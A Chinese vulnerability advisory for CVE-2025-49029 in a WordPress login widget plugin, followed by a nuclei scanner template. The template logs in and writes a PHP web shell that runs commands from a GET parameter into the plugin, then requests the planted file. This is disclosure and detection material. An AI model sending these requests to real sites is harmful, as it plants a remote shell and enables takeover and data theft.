WordPress Custom Login And Signup Widget Plugin Code Injection Vulnerability

漏洞信息

漏洞名称： WordPress Custom Login And Signup Widget Plugin Code Injection Vulnerability

漏洞编号：

• CVE： CVE-2025-49029

漏洞类型： 代码注入

漏洞等级： 高危

漏洞描述： WordPress Custom Login And Signup Widget插件是一款用于WordPress网站的登录和注册小工具插件，广泛用于增强网站的用户交互功能。该插件在1.0及之前版本中存在代码注入漏洞，攻击者可以通过构造恶意请求，向服务器注入并执行任意PHP代码。这种漏洞的根源在于插件对用户输入的控制不足，未能正确过滤或转义用户提供的数据，导致攻击者可以利用这一点执行恶意代码。由于该漏洞允许攻击者在服务器上执行任意代码，因此可能导致网站被完全控制、敏感数据泄露或其他恶意操作。值得注意的是，利用此漏洞需要攻击者具备一定的权限，即需要先通过认证，但这并不降低漏洞的严重性，因为一旦攻击者获得必要的权限，就可以轻松利用此漏洞。

产品厂商： bitto

产品名称： Custom Login And Signup Widget

影响版本： <= 1.0

搜索语法： http.component:”wordpress”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/59223adba0791254b5914f95c49a72ca5cfe26e3/http%2Fcves%2F2025%2FCVE-2025-49029.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-49029

info:
  name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Code Injection
  author: pussycat0x
  severity: high
  description: |
    Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0.
  impact: |
    An attacker can inject and execute arbitrary PHP code on the server, potentially leading to full system compromise, data theft, or unauthorized access to sensitive information.
  remediation: |
    Update the Custom Login And Signup Widget plugin to a version that addresses this vulnerability. Remove or restrict access to the vulnerable functionality if an update is not available.
  reference:
    - https://github.com/Nxploited/CVE-2025-49029
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2025-49029
    cwe-id: CWE-94
  metadata:
    max-request: 3
    vendor: bitto
    product: custom-login-and-signup-widget
    shodan-query: http.component:"wordpress"
  tags: cve,cve2025,wordpress,intrusive,plugin,code-injection,authenticated,bitto

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: {{BaseURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 121
        Origin: {{BaseURL}}
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        Priority: u=0, i

        text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

      - |
        GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "custom-login-and-signup-widget"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: word
        part: body
        words:
          - "PHP Parse error"
          - "PHP Fatal error"
          - "custom-login-and-signup-widget"